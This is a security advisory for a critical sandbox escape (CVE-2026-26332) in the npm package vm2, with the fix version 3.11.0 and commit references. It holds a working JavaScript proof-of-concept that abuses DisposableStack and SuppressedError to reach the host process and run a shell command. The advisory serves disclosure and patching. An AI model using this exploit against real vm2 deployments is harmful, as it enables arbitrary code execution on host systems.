CRITICAL 9.8

GHSA-55hx-c926-fr95

VM2 Has a Sandbox Escape Issue via SuppressedError

Details

In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code.

### PoC ```js const { VM } = require("vm2");

const vm = new VM();

vm.run(` const ds = new DisposableStack(); ds.defer(() => { throw null; }); ds.defer(() => { const e = Error(); e.name = Symbol(); e.stack; }); try { ds.dispose(); } catch(e) { const Function = e.suppressed.constructor.constructor; const process = new Function("return process;")(); const { execSync } = process.mainModule.require("node:child_process"); execSync("echo pwned", { stdio: "inherit" }); } `); ```

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / vm2

Introduced in: 0 Fixed in: 3.11.0

Fix npm install vm2@3.11.0

References

https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95 [WEB]
https://nvd.nist.gov/vuln/detail/CVE-2026-26332 [ADVISORY]
https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0 [WEB]
https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f [WEB]
https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca [WEB]
https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d [WEB]
https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338 [WEB]
https://github.com/patriksimek/vm2 [PACKAGE]
https://github.com/patriksimek/vm2/releases/tag/v3.11.0 [WEB]